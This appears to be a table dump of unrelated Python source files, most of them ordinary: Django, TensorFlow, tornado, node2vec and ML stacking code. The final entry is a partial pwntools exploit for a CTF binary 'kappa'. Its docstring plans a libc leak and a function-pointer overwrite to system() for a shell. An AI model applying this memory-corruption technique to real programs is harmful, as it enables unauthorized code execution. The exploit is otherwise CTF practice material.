index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,600 | 90b9f8b66f4db0cf33a72ef92a874263dbf744a5 | from django.db import models
from django.conf import settings
class Image(models.Model):
    """
    Image model, really just a default, a more reasonable one
    would create some thumbnails based on the need of the site.
    """
    # Optional display title; save() falls back to the uploaded file's name.
    title = models.CharField(max_length=255, blank=True, null=True)
    image = models.ImageField(upload_to="images")
    description = models.TextField(blank=True, null=True)
    uploaded = models.DateTimeField(auto_now_add=True)  # set once at creation
    modified = models.DateTimeField(auto_now=True)  # refreshed on every save

    def __unicode__(self):
        # Python 2 / old-Django string representation of the instance.
        return '%s' % self.title

    def save(self, *args, **kwargs):
        # Default the title to the uploaded file's name when none was given.
        if not self.title:
            self.title = self.image.name
        super(Image, self).save(*args, **kwargs) # Call the "real" save() method.

    @property
    def url(self):
        # Public URL of the stored file, built from MEDIA_URL + the file path.
        return '%s%s' % (settings.MEDIA_URL, self.image)

    class Meta:
        verbose_name = "basic image"
        verbose_name_plural = "basic images"
        ordering = ['-modified',]
991,601 | 440c1101a229df90fc661ac4e59b7018152fca52 | import tensorflow as tf
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# Load the Fashion-MNIST data, split into train and test sets.
(train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data()
print(train_image.shape) # print the training-data dimensions
print(train_label.shape) # print the label info
print(train_image[0]) # first image is a matrix with values in 0-255
plt.imshow(train_image[0]) # display the first image
plt.show()
print('打印所有标签:',train_label)
print('打印第一个标签:',train_label[0])
# Normalize: pixels are 0-255, scale them into the 0-1 range.
train_image = train_image / 255
test_image = test_image / 255
# Build the model
model = tf.keras.Sequential()
# The input is a 2-D matrix but Dense layers take 1-D input, so flatten first.
model.add(tf.keras.layers.Flatten(input_shape=(28, 28)))
model.add(tf.keras.layers.Dense(128, activation='relu'))
model.add(tf.keras.layers.Dense(10, activation='softmax'))
# Print the model summary
model.summary()
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy',
              metrics=['acc'])
model.fit(train_image, train_label, epochs=5)
# Evaluate on the held-out test set
print('测试数据:')
model.evaluate(test_image, test_label)
991,602 | 2e8bdf4e2468eba083a2fe8c292ae04d2d69b411 | l=[]
# Digit alphabet for base-36 (0-9 then A-Z).
sonuc=["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
a=int(input("şifre giriniz:"))
i=1
# Repeated division by 36: collect remainders, then the final quotient.
# NOTE(review): when the final quotient is 0 a leading zero digit is kept — confirm intended.
while(i==1):
    kalan=(a%36)
    l.append(kalan)
    bolum=int(a/36)
    if (bolum>=36):
        i=1
        a=bolum
    else:
        l.append(bolum)
        i=0
# Digits were collected least-significant first; reverse before printing.
l.reverse()
print(l)
uzunluk=len(l)
for i in range(uzunluk):
    b=l[i]
    print(sonuc[b],end="")
|
991,603 | a043710528a2169c7a05436639a85026e1dc99f6 | import uvicorn
if __name__ == "__main__":
    # Serve the `app` object exported by the `src` package on all interfaces,
    # with auto-reload for development use.
    uvicorn.run(
        "src:app", host="0.0.0.0", port=5000, log_level="info", debug=True, reload=True
    )
|
991,604 | dcd02e0862a42a3b8bd09199064c1bee80308ebd | import threading
import tornado.ioloop
import tornado.web
from tornado.httpserver import HTTPServer
import time
import logging
from handler import WsRPCHandler
from auth import authenticator
import tornado.options
from tornado.log import enable_pretty_logging
enable_pretty_logging()
logging.getLogger().setLevel(logging.INFO)
def create_app(application_settings=None):
    """Build the tornado Application serving WsRPCHandler at '/'.

    application_settings, when given as a dict, overrides the default
    settings (e.g. to swap in a different authenticator).
    """
    merged_settings = {'authenticator': authenticator}
    # A caller-supplied dict (e.g. a new auth function) overrides the defaults.
    if isinstance(application_settings, dict):
        merged_settings.update(application_settings)
    routes = [(r'/', WsRPCHandler)]
    return tornado.web.Application(routes, **merged_settings)
def create_server(app, port=8888):
    """Bind an HTTPServer for `app` on `port` and return it.

    The server starts handling requests once the IOLoop runs.
    """
    server = HTTPServer(app)
    server.listen(port)
    return server
def start_ioloop():
    """Run the singleton tornado IOLoop in the calling thread (blocks until stopped)."""
    logging.info("ws_rpc ioloop started")
    ioloop = tornado.ioloop.IOLoop.instance()
    ioloop.start()
    logging.info("ws_rpc ioloop stopped")
def stop_ioloop():
    """Request the running IOLoop to stop.

    add_callback is used so the stop is scheduled on the loop's own thread,
    making this safe to call from another thread.
    """
    logging.info("stopping ws_rpc ioloop")
    ioloop = tornado.ioloop.IOLoop.instance()
    ioloop.add_callback(ioloop.stop)
def main():
    """Start the ws_rpc server in a background IOLoop thread and run until Ctrl+C."""
    tornado.options.parse_command_line()
    # Parenthesized print works on both Python 2 and 3 (the old statement form
    # was Python-2 only).
    print("ws_rpc main is running, exit with ctrl+c")
    logging.info("creating application")
    app = create_app()
    logging.info("creating server")
    server = create_server(app)
    logging.info("starting ioloop thread")
    thread = threading.Thread(target=start_ioloop)
    thread.start()
    try:
        # Keep the main thread alive so KeyboardInterrupt can be caught here.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        server.stop()
        stop_ioloop()
        thread.join()
# Script entry point.
if __name__ == "__main__":
    logging.info("running main")
    main()
|
991,605 | f929b3059e009fd60347a8545d117f63af4b6eaa | n1,n2=map(int,input().split())
# Add the two integers read above and print the result.
# (Renamed from `sum`, which shadowed the builtin; the redundant `sum=0`
# initialization before the assignment is dropped.)
total = n1 + n2
#print result
print(total)
|
991,606 | 291411679f4a7f83e017945e30d70d37c9c289ec | from __future__ import print_function
import json
from os.path import isfile, join
from os import makedirs
import argparse
from node2vec import Node2Vec
import time
import shutil
class Entity2Vec(Node2Vec):
    """Generates a set of property-specific entity embeddings from a Knowledge Graph"""

    def __init__(self, is_directed, preprocessing, is_weighted, p, q, walk_length, num_walks, dimensions, window_size,
                 workers, iterations, feedback_file):
        Node2Vec.__init__(self, is_directed, preprocessing, is_weighted, p, q, walk_length, num_walks, dimensions,
                          window_size, workers, iterations)
        # Optional DAT file with all user-item couples, copied into the dataset
        # graphs directory before the walks are generated.
        self.feedback_file = feedback_file

    def e2v_walks_learn(self, properties_names, dataset):
        """Run node2vec once per property graph, writing one embedding file each.

        properties_names: iterable of property names (URIs allowed; only the
        part after the last '/' is used for file names).
        dataset: dataset directory name under datasets/ and emb/.
        """
        n = self.num_walks
        p = int(self.p)
        q = int(self.q)
        l = self.walk_length
        d = self.dimensions
        it = self.iter
        win = self.window_size
        try:
            makedirs('emb/%s' % dataset)
        except OSError:
            # Directory already exists -- only filesystem errors are ignored
            # (the previous bare `except` also swallowed KeyboardInterrupt etc.).
            pass
        # copy the feedback_file, if declared
        if self.feedback_file:
            print('Copying feedback file %s' % self.feedback_file)
            shutil.copy2(self.feedback_file, "datasets/%s/graphs/feedback.edgelist" % dataset)
        # iterate through properties
        for prop_name in properties_names:
            prop_short = prop_name
            if '/' in prop_name:
                # Keep only the final path segment of URI-style property names.
                prop_short = prop_name.split('/')[-1]
            graph = "datasets/%s/graphs/%s.edgelist" % (dataset, prop_short)
            try:
                makedirs('emb/%s/%s' % (dataset, prop_short))
            except OSError:
                pass
            emb_output = "emb/%s/%s/num%d_p%d_q%d_l%d_d%d_iter%d_winsize%d.emd" % (dataset,
                                                                                   prop_short, n, p, q, l, d, it, win)
            if not isfile(emb_output):  # skip work if the embedding file already exists
                print('running with', graph)
                super(Entity2Vec, self).run(graph, emb_output)  # run function defined in the parent class node2vec
            else:
                print('Embedding file already exist, going to next property...')
                continue

    @staticmethod
    def parse_args():
        """
        Parses the entity2vec arguments.
        """
        parser = argparse.ArgumentParser(description="Run entity2vec.")
        parser.add_argument('--walk_length', type=int, default=10,
                            help='Length of walk per source. Default is 10.')
        parser.add_argument('--num_walks', type=int, default=500,
                            help='Number of walks per source. Default is 40.')
        parser.add_argument('--p', type=float, default=1,
                            help='Return hyperparameter. Default is 1.')
        parser.add_argument('--q', type=float, default=1,
                            help='Inout hyperparameter. Default is 1.')
        parser.add_argument('--weighted', dest='weighted', action='store_true',
                            help='Boolean specifying (un)weighted. Default is unweighted.')
        parser.add_argument('--unweighted', dest='unweighted', action='store_false')
        parser.set_defaults(weighted=False)
        parser.add_argument('--directed', dest='directed', action='store_true',
                            help='Graph is (un)directed. Default is directed.')
        parser.set_defaults(directed=False)
        parser.add_argument('--no_preprocessing', dest='preprocessing', action='store_false',
                            help='Whether preprocess all transition probabilities or compute on the fly')
        parser.set_defaults(preprocessing=True)
        parser.add_argument('--dimensions', type=int, default=500,
                            help='Number of dimensions. Default is 128.')
        parser.add_argument('--window-size', type=int, default=10,
                            help='Context size for optimization. Default is 10.')
        parser.add_argument('--iter', default=5, type=int,
                            help='Number of epochs in SGD')
        parser.add_argument('--workers', type=int, default=8,
                            help='Number of parallel workers. Default is 8.')
        parser.add_argument('--config_file', nargs='?', default='config/properties.json',
                            help='Path to configuration file')
        parser.add_argument('--dataset', nargs='?', default='movielens_1m',
                            help='Dataset')
        parser.add_argument('--feedback_file', dest='feedback_file', default=False,
                            help='Path to a DAT file that contains all the couples user-item')
        return parser.parse_args()
if __name__ == '__main__':
    start_time = time.time()
    args = Entity2Vec.parse_args()
    print('Parameters:\n')
    print('walk length = %d\n' % args.walk_length)
    print('number of walks per entity = %d\n' % args.num_walks)
    print('p = %s\n' % args.p)
    print('q = %s\n' % args.q)
    print('weighted = %s\n' % args.weighted)
    print('directed = %s\n' % args.directed)
    print('no_preprocessing = %s\n' % args.preprocessing)
    print('dimensions = %s\n' % args.dimensions)
    print('iterations = %s\n' % args.iter)
    print('window size = %s\n' % args.window_size)
    print('workers = %s\n' % args.workers)
    print('config_file = %s\n' % args.config_file)
    print('dataset = %s\n' % args.dataset)
    print('feedback file = %s\n' % args.feedback_file)
    # BUG FIX: __init__ takes 12 arguments (ending with feedback_file); the old
    # call also passed config_file and dataset and raised TypeError.
    e2v = Entity2Vec(args.directed, args.preprocessing, args.weighted, args.p, args.q, args.walk_length,
                     args.num_walks, args.dimensions, args.window_size, args.workers, args.iter,
                     args.feedback_file)
    # BUG FIX: e2v_walks_learn requires (properties_names, dataset); the old call
    # passed neither. Property names are read from the JSON config file.
    with open(args.config_file) as config_read:
        # Assumes the config JSON is (or iterates as) the property names -- TODO confirm schema.
        properties_names = json.load(config_read)
    e2v.e2v_walks_learn(properties_names, args.dataset)
    print("--- %s seconds ---" % (time.time() - start_time))
|
991,607 | 81f897ea2a38caa81d178d43a1795dca7d495b96 | # Generated by Django 3.2 on 2021-07-30 03:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the optional `post_id` CharField to the `mname` model."""

    dependencies = [
        ('menteerequest', '0013_mentee_request_finish_check'),
    ]

    operations = [
        migrations.AddField(
            model_name='mname',
            name='post_id',
            field=models.CharField(blank=True, max_length=20),
        ),
    ]
|
991,608 | a45a0f276014a24e5374c2a233395bb12edf08dd | import cv2
# Remember to rotate your camera
cap = cv2.VideoCapture(0)
while cap.isOpened():
    isSuccess, frame = cap.read()
    # BUG FIX: the success flag was ignored; a failed grab returns frame=None
    # and cv2.rotate would raise on it.
    if not isSuccess:
        break
    rotated = cv2.rotate(frame, cv2.ROTATE_90_COUNTERCLOCKWISE)
    cv2.imshow('My webcam stream', rotated)
    # Press 'Esc' to quit
    if cv2.waitKey(1) == 27:
        break
cap.release()
cv2.destroyAllWindows()
|
991,609 | 2c41c2e4e8fc3c0ab42341ec89d52f94d1793976 | import io
# Running totals across all assertions in this test helper module.
num_tests = 0
failed_tests = 0


def equal(expr, expected):
    """Record one test result: print pass/fail and update the counters."""
    global num_tests
    global failed_tests
    num_tests += 1
    if expr != expected:
        failed_tests += 1
        print("Failed!\n expected: '", expected, "'\n but got : '", expr, "'", sep = '')
    else:
        print("Test Passed with result: '", expr, "'", sep = '')
    return
def str_print(*objects):
    """Render *objects* exactly as print() would (without the newline) and return the text."""
    buffer = io.StringIO()
    print(*objects, end="", file=buffer)
    return buffer.getvalue()
def output(*objects, expected=""):
    """Assert that printing *objects* produces exactly `expected`."""
    rendered = str_print(*objects)
    equal(rendered, expected)
    return
def summary():
    """Print a final pass/fail summary for all recorded tests."""
    print("-------------------------------------------")
    if failed_tests:
        print("{} out of {} tests failed!".format(failed_tests, num_tests))
    else:
        print("All", num_tests, "passed!")
|
991,610 | 9c8dd33cd8b40af67e19b3233d0af30cb2042f2a | # -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import sklearn.preprocessing as skp
import sklearn.feature_extraction as skf
import scipy.sparse as ss
import sklearn.model_selection as sms
import sklearn.linear_model as slm
import tqdm
import sklearn.neighbors as skn
import sklearn.ensemble as se
import seaborn as sns
# Load the insurance-policy dataset.
renesans=pd.read_csv("/Users/sveta/Downloads/Задача 1/Book1.csv",sep=",",header=0)
renesans=pd.DataFrame(renesans)
# lets have a look into our data
renesans["POLICY_ID"].unique()
renesans["POLICY_BEGIN_MONTH"].unique()
renesans["POLICY_END_MONTH"].unique()
renesans["POLICY_SALES_CHANNEL"].unique() # many channels
renesans["POLICY_SALES_CHANNEL_GROUP"].unique() #less chanels, probably will use it
renesans["POLICY_BRANCH"].unique() # Moscow and St-Peter
renesans["POLICY_MIN_DRIVING_EXPERIENCE"].unique() #needs to be cleaned. update: done
renesans["POLICY_MIN_AGE"].unique()
renesans["VEHICLE_MAKE"].unique() #car brands
renesans["VEHICLE_MODEL"].unique() #car model
renesans["VEHICLE_ENGINE_POWER"].unique()
renesans["VEHICLE_IN_CREDIT"].unique()
renesans["VEHICLE_SUM_INSURED"].unique()
renesans["POLICY_INTERMEDIARY"].unique()
renesans["INSURER_GENDER"].unique()
renesans["POLICY_CLM_N"].unique() # number of claims on the policy
renesans["POLICY_CLM_GLT_N"].unique() #hell knows
renesans["POLICY_COURT_SIGN"].unique() #hell knows
renesans["POLICY_PRV_CLM_N"].unique() # hell knows 0/1
renesans["POLICY_PRV_CLM_GLT_N"].unique()
renesans["CLAIM_AVG_ACC_ST_PRD"].unique() # avg claim idk
renesans["POLICY_HAS_COMPLAINTS"].unique() #bi var
renesans["POLICY_YEARS_RENEWED_N"].unique() #what is N???
renesans["POLICY_DEDUCT_VALUE"].unique() #smth numerical
renesans["CLIENT_REGISTRATION_REGION"].unique() #regions
renesans["POLICY_PRICE_CHANGE"].unique() #price change num
# The data are dirty: the driving-experience column mixes start years with
# year counts, so filter out the year-like values (>100) and subtract them
# from 2018 to get years of experience.
renesans.loc[renesans["POLICY_MIN_DRIVING_EXPERIENCE"]>100,"POLICY_MIN_DRIVING_EXPERIENCE"]=2018-renesans.loc[renesans["POLICY_MIN_DRIVING_EXPERIENCE"]>100,"POLICY_MIN_DRIVING_EXPERIENCE"]
# Build the policy duration: END months belong to 2019, BEGIN months to 2018.
renesans["POLICY_END_MONTH"]='2019'+'-'+renesans["POLICY_END_MONTH"].map(str)+'-'+'01'
renesans["POLICY_END_MONTH"]=pd.to_datetime(renesans["POLICY_END_MONTH"])
renesans["POLICY_BEGIN_MONTH"]='2018'+'-'+renesans["POLICY_BEGIN_MONTH"].map(str)+'-'+'01'
renesans["POLICY_BEGIN_MONTH"]=pd.to_datetime(renesans["POLICY_BEGIN_MONTH"])
renesans["POLICY_LEN"]=renesans["POLICY_END_MONTH"]-renesans["POLICY_BEGIN_MONTH"]
renesans["POLICY_LEN"]=renesans["POLICY_LEN"].dt.days/30
renesans["POLICY_LEN"]=renesans["POLICY_LEN"].round(0)
renesans["POLICY_LEN"]=[1 if (x==12) else 0 for x in renesans["POLICY_LEN"].values]  # 1 = full-year policy
renesans["POLICY_LEN"].unique()
### continue preparing the data: binarize branch (Moscow=1) and gender (F=1)
renesans["POLICY_BRANCH"]=[1 if (x=='Москва') else 0 for x in renesans["POLICY_BRANCH"].values]
renesans["INSURER_GENDER"]=[1 if (x=='F') else 0 for x in renesans["INSURER_GENDER"].values]
# Drop the NA-like rows ('N' in POLICY_YEARS_RENEWED_N)
renesans.drop(renesans.loc[renesans['POLICY_YEARS_RENEWED_N']=='N'].index, inplace=True)
# Choose what goes into the analysis; keep the TEST policy ids for the output file.
policyidtest=renesans.loc[renesans['DATA_TYPE']=='TEST ','POLICY_ID']
renesans=renesans.drop(['POLICY_ID','POLICY_BEGIN_MONTH', 'POLICY_END_MONTH','POLICY_SALES_CHANNEL','POLICY_INTERMEDIARY'],axis=1)
### and prepare the encoders
standard = skp.StandardScaler()
maxabs = skp.MaxAbsScaler()
label = skp.LabelEncoder()
onehot = skp.OneHotEncoder()
season = skp.LabelBinarizer()
labelbin = skp.LabelBinarizer()
absvar = ['VEHICLE_ENGINE_POWER', 'VEHICLE_SUM_INSURED']
scalevar = ['POLICY_MIN_AGE', 'POLICY_MIN_DRIVING_EXPERIENCE', 'CLAIM_AVG_ACC_ST_PRD',
            'POLICY_YEARS_RENEWED_N', 'POLICY_DEDUCT_VALUE', 'POLICY_PRICE_CHANGE']
bivar = ['POLICY_BRANCH', 'VEHICLE_IN_CREDIT', 'CLIENT_HAS_DAGO', 'CLIENT_HAS_OSAGO',
         'POLICY_COURT_SIGN', 'POLICY_HAS_COMPLAINTS', 'INSURER_GENDER','POLICY_LEN']
onehotvar = ['POLICY_SALES_CHANNEL_GROUP']
# 'POLICY_CLM_N', 'POLICY_CLM_GLT_N', 'POLICY_PRV_CLM_N','POLICY_PRV_CLM_GLT_N' are handled separately
### normalize / encode
renesans_abs=maxabs.fit_transform(renesans[absvar])
renesans_scale = standard.fit_transform(renesans[scalevar])
renesans_bi = renesans[bivar]
renesans_onehot = onehot.fit_transform(renesans[onehotvar])
renesans_N = labelbin.fit_transform(renesans['POLICY_CLM_N'])
# NOTE(review): the binarizer is fitted only on POLICY_CLM_N and reused with
# transform() for the three columns below -- confirm their label sets match.
renesans_GLT_N = labelbin.transform(renesans['POLICY_CLM_GLT_N'])
renesans_PRV_N = labelbin.transform(renesans['POLICY_PRV_CLM_N'])
renesans_PRV_GLT_N = labelbin.transform(renesans['POLICY_PRV_CLM_GLT_N'])
reg=['CLIENT_REGISTRATION_REGION']
Vreg = skf.DictVectorizer()
renesans_reg = Vreg.fit_transform(renesans[reg].fillna('-').T.to_dict().values())
cars = ['VEHICLE_MAKE', 'VEHICLE_MODEL']
Vcars = skf.DictVectorizer()
renesans_cars = Vcars.fit_transform(renesans[cars].fillna('-').T.to_dict().values())
#### assemble the full sparse design matrix
R_train_ = ss.hstack([renesans_abs, renesans_scale, renesans_bi, renesans_onehot, renesans_N,
                      renesans_GLT_N, renesans_PRV_N, renesans_PRV_GLT_N, renesans_reg, renesans_cars])
## In a previous version of this code an error surfaced at the very end: the
# validation sample came out smaller than the test one because some variable
# values were absent there, so some columns were never created.
# Workaround: since nothing was sorted, row order is preserved everywhere, so
# take the row numbers of the train sample and then of the test sample, and
# filter the needed rows per sample.
renesans_DT=np.array([1 if (x=='TRAIN') else 0 for x in renesans["DATA_TYPE"].values])
Train_rows=(renesans_DT==1).nonzero()[0]
Test_rows=(renesans_DT==0).nonzero()[0]
# split the samples
R_train_all=R_train_.tocsc()[Train_rows]
R_test_all=R_train_.tocsc()[Test_rows]
y_train = renesans.loc[renesans['DATA_TYPE']=='TRAIN','POLICY_IS_RENEWED']
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_all, y_train, test_size = 0.2,
                                                              random_state = 1)
# model quality measure -- the sum of true positives and true negatives
# more at https://towardsdatascience.com/metrics-to-evaluate-your-machine-learning-algorithm-f10ba6e38234
### Start with a classic: the logit classifier.
stkf = sms.StratifiedKFold(n_splits = 5, random_state = 1, shuffle = True)
C_space = np.logspace(-3, 2, 6)
# BUG FIX: the loop body previously sat fused on the `for` line, so only the
# classifier was rebuilt per C and a single score (for the last C) printed;
# both statements now run for every C value.
for c in tqdm.tqdm(C_space):
    lr = slm.LogisticRegression(C = c, random_state = 1)
    print(c, sms.cross_val_score(lr, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean())
# I don't expect much from the logit, so tune it right away
### LR (bagged logistic regression)
lr = slm.LogisticRegression(C = 0.1, random_state = 1)
bg_lr = se.BaggingClassifier(base_estimator = lr, n_estimators = 100, random_state = 1, n_jobs=1)
params = {'max_features': [3,6,12,24,48,96,192,384],
          'max_samples': [0.5, 0.75, 0.9]}
rs_lr = sms.RandomizedSearchCV(estimator = bg_lr, n_jobs = 2, cv = stkf, verbose = 2,
                               param_distributions = params, scoring = 'accuracy', n_iter = 20, random_state=1)
rs_lr.fit(R_train_2, y_train_2)
print(rs_lr.best_score_, rs_lr.best_params_) #0.6651854963805585 {'max_samples': 0.9, 'max_features': 384}
lr = slm.LogisticRegression(C = 0.1, random_state = 1)
bg_lr = se.BaggingClassifier(base_estimator = lr, n_estimators = 10, random_state = 1, n_jobs=2, max_features=0.7)
print(sms.cross_val_score(bg_lr, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean()) #0.6688857348064529
### Next try KNN; drop all categorical features first to find a workable sample
### size and hyperparameters quickly, then bag it
#(why bagging: see https://www.quora.com/What-is-bagging-in-machine-learning)
R_train_knn = ss.hstack([renesans_abs, renesans_scale, renesans_bi])
R_train_knn=R_train_knn.tocsc()[Train_rows]
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_knn, y_train, test_size = 0.2, random_state = 1)
R_train_2_short = R_train_2[:10000,:]
y_train_2_short = y_train_2[:10000]
knn = skn.KNeighborsClassifier()
clf = sms.GridSearchCV(estimator = knn, n_jobs = 1, cv = stkf, return_train_score = True, verbose = 1,
                       param_grid = {"n_neighbors": [1,3,5,10,20,50], "weights": ["uniform", "distance"]})
clf.fit(R_train_2_short, y_train_2_short)
clf.cv_results_['mean_test_score'].mean()#0.61
clf.best_params_#n_neighbors': 50, 'weights': 'uniform'
# widen the neighbor grid around the previous optimum
clf = sms.GridSearchCV(estimator = knn, n_jobs = 1, cv = stkf, return_train_score = True, verbose = 0,
                       param_grid = {"n_neighbors":[30,70,100,150], "weights": ['uniform', 'distance']})
clf.fit(R_train_2_short, y_train_2_short)
clf.best_score_ #best score
clf.best_params_ # best parametrs
# refit KNN with the tuned hyperparameters on a richer feature set
knn = skn.KNeighborsClassifier(n_neighbors = 100, weights = 'distance')
R_train_all = ss.hstack([renesans_abs, renesans_scale, renesans_bi, renesans_N,renesans_onehot,
                         renesans_GLT_N, renesans_PRV_N, renesans_PRV_GLT_N])
# NOTE(review): the next line slices R_train_ (the full matrix), not the
# R_train_all just built above -- confirm which one is intended.
R_train_knn=R_train_.tocsc()[Train_rows]
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_knn, y_train, test_size = 0.2, random_state = 1)
R_train_2_short = R_train_2[:10000,:]
y_train_2_short = y_train_2[:10000]
print(sms.cross_val_score(knn, R_train_2_short, y_train_2_short, scoring='accuracy', cv=stkf).mean()) #0.65 improving
### repeat on the full feature set (regions and cars included)
R_train_all = ss.hstack([renesans_abs, renesans_scale, renesans_bi, renesans_onehot, renesans_N,
                         renesans_GLT_N, renesans_PRV_N, renesans_PRV_GLT_N, renesans_reg, renesans_cars])
R_train_all=R_train_all.tocsc()[Train_rows]
R_train_2, R_valid, y_train_2, y_valid = sms.train_test_split(R_train_all, y_train, test_size = 0.2, random_state = 1)
R_train_2_short = R_train_2[:10000,:]
y_train_2_short = y_train_2[:10000]
print(sms.cross_val_score(knn, R_train_2_short, y_train_2_short, scoring='accuracy', cv=stkf).mean())
bg = se.BaggingClassifier(base_estimator = knn, max_samples = 10000, random_state = 1, verbose = 1)
print(sms.cross_val_score(bg, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean())# 0.658
### Random forest; hyperparameter -- Gini, see https://www.quora.com/Machine-Learning/Are-gini-index-entropy-or-classification-error-measures-causing-any-difference-on-Decision-Tree-classification\
rf = se.RandomForestClassifier(random_state = 1, n_estimators=100, max_depth=1000, oob_score=True, class_weight='balanced')
print(sms.cross_val_score(rf, R_train_2, y_train_2, scoring='accuracy', cv=stkf).mean()) #0.697 best result so far
## Tune the RF
params = {"max_depth": [50, 150, 550, 800, 1500],
          "min_samples_leaf": [1, 3, 5, 8],
          "max_features": [2, 5, 15, 40, 100]}
rs = sms.RandomizedSearchCV(estimator = rf, n_jobs = 2, cv = stkf, verbose = 2, param_distributions = params,
                            scoring = 'accuracy', n_iter = 20)
rs.fit(R_train_2, y_train_2)
print(rs.best_score_, rs.best_params_) #0.7083117890382626 {'min_samples_leaf': 1, 'max_features': 100, 'max_depth': 300}
### Gradient boosting
# check the parameters!!!
params = {'n_estimators': [100, 400, 700, 1000],
          'max_depth': [2, 4, 6, 8, 10],
          'min_samples_leaf': [1, 2, 3, 5],
          'max_features': [2, 4, 8, 16, 32, 64, 128]}
gb = se.GradientBoostingClassifier(random_state = 1)
rs_gb = sms.RandomizedSearchCV(estimator = gb, n_jobs = 2, cv = stkf, verbose = 2, param_distributions = params,
                               scoring = 'accuracy', n_iter = 50, random_state=1)
rs_gb.fit(R_train_2, y_train_2)
print(rs_gb.best_score_, rs_gb.best_params_)#0.7157607290589452 {'n_estimators': 700, 'min_samples_leaf': 2, 'max_features': 128, 'max_depth': 4}
# We have 4 models: fit them on the train sample, check accuracy, get their
# predictions on the validation sample and build a second-level (stacking) model
### CHECK THE PARAMETERS!!!
rf = se.RandomForestClassifier(random_state = 1, n_estimators=100, max_depth=300, oob_score=True,
                               class_weight='balanced', max_features = 100)
gb = se.GradientBoostingClassifier(random_state = 1, n_estimators = 700, min_samples_leaf = 2, max_depth = 4,
                                   max_features = 128)
lr.fit(R_train_2, y_train_2)
print("lr:", lr.score(R_valid, y_valid)) #0.6700058165837265
bg.fit(R_train_2, y_train_2)
print("bg:", bg.score(R_valid, y_valid))#0.6592128223356815
rf.fit(R_train_2, y_train_2)
print("rf:", rf.score(R_valid, y_valid))#0.7093000710915789
gb.fit(R_train_2, y_train_2)
print("gb:", gb.score(R_valid, y_valid))#0.718606605053965
# No big differences from cross-validation, and no obvious over/underfitting
# either, since the scores are neither extreme nor critically low.
# Next, obtain the class probabilities
pred_lr = lr.predict_proba(R_valid)[:,1]
pred_bg = bg.predict_proba(R_valid)[:,1]
pred_rf = rf.predict_proba(R_valid)[:,1]
pred_gb = gb.predict_proba(R_valid)[:,1]
# "average" all the results with a logistic regression (meta-algorithm / stacking)
meta_features = [pred_lr, pred_bg, pred_rf, pred_gb]
meta_X_valid = pd.DataFrame(meta_features).T
meta_X_valid.columns = ['lr', 'bg', 'rf', 'gb']
meta_X_valid.head()
meta_lr = slm.LogisticRegression(random_state = 1)
print(sms.cross_val_score(lr, meta_X_valid, y_valid, scoring='accuracy', cv=stkf).mean())
meta_lr.fit(meta_X_valid, y_valid)
## apply the whole stack to the test sample
pred_lr = lr.predict_proba(R_test_all)[:,1]
pred_bg = bg.predict_proba(R_test_all)[:,1]
pred_rf = rf.predict_proba(R_test_all)[:,1]
pred_gb = gb.predict_proba(R_test_all)[:,1]
meta_features = [pred_lr, pred_bg, pred_rf, pred_gb]
meta_X_test = pd.DataFrame(meta_features).T
meta_X_test.columns = ['lr', 'bg', 'rf', 'gb']
prediction = meta_lr.predict(meta_X_test)
prediction=pd.DataFrame(prediction)
prediction.columns=['prediction']
outfile=pd.DataFrame(prediction,policyidtest)
# Export
outfile.to_csv('/Users/sveta/Downloads/Задача 1/prediction.csv')
### plot the predicted-class counts
sns.set(style="darkgrid")
ax = sns.countplot(x=outfile['prediction'], data=outfile)
ax.figure.savefig('/Users/sveta/Downloads/Задача 1/output.png')
# Dobby is free
991,611 | 2fdaca50777f273534a00375b9f4a5c92c353c27 | #!/usr/bin/env python2
from pwn import *
'''
bugs:
if you have a charizard, you can set the charizards artwork so that bird_attack_name points to a mem location and it will leak that memlocation by switching to the charizard in a fight
when catching a pokemon when you are full, it does not set the poke_type correctly. so if you replace a kakuna with the charizard, the function pointer will point to inside the artwork (so we can set that to system())
also: choose_pokemon can return -1. I don't think this is useful for exploitation.
exploit strat:
catch 4 kakunas
catch the charizard, replace on of the kakunas with it. Name the charizard /bin/sh Change artwork, set charizard->bird_attack_name to a pointer to stdin@data, set charizard->bird_health to a high value. Then go into battle, switch to charizard, attack something to leak libc address. Then change artwork of charizard again, set charizard->kakuna_proc to system@libc.
then inspect ur pokes to get shell!
offsets:
artwork offset: 0x0F
kakuna_proc: 0x210
bird_health: 0x5ec
bird_attack_name: 0x5f4
'''
#context.log_level = 'DEBUG'
context.terminal = ['gnome-terminal', '-e']
# Target binary and its libc (used for the system() symbol offset).
elf = ELF("./kappa")
libc = ELF("/lib/i386-linux-gnu/i686/cmov/libc-2.19.so")
r = process("./kappa_nosleep")
#r = gdb.debug("./kappa_nosleep")
# Encounter counter (every 13th grass encounter is the charizard) and how many
# pokemon we have caught so far.
grass_ctr = 0
num_caught = 0
def catch_poke(name="poop", run=False):
    """Walk into the grass once and (usually) catch a pokemon.

    name: nickname given to the caught pokemon.
    run: if True, run away once we already hold 4 pokemon.
    Every 13th encounter is the charizard, which must be attacked four
    times before it can be caught.
    """
    global grass_ctr, num_caught
    grass_ctr += 1
    r.recvuntil("work\n\n")
    r.sendline("1")
    r.recvuntil(".\n.\n.\n")
    l = r.recvline()
    if l.startswith("You"):
        # no pokemon
        return
    if run and num_caught >= 4:
        r.sendline("3")
        return
    if grass_ctr % 13 != 0:
        # kakuna
        r.sendline('2')
        r.recvuntil("?\n")
        r.sendline(name)
        num_caught += 1
        return
    # charizard
    # attack 4 times, then catch and name it
    for _ in range(0, 4):
        r.recvuntil("Run\n")
        r.sendline("1")
    r.recvuntil("Run\n")
    r.sendline("2")
    r.recvuntil("?\n")
    r.sendline(name)
# catch the kakunas, keep 4 and see 13 encounters
for _ in range(12):
    catch_poke("poop", True)
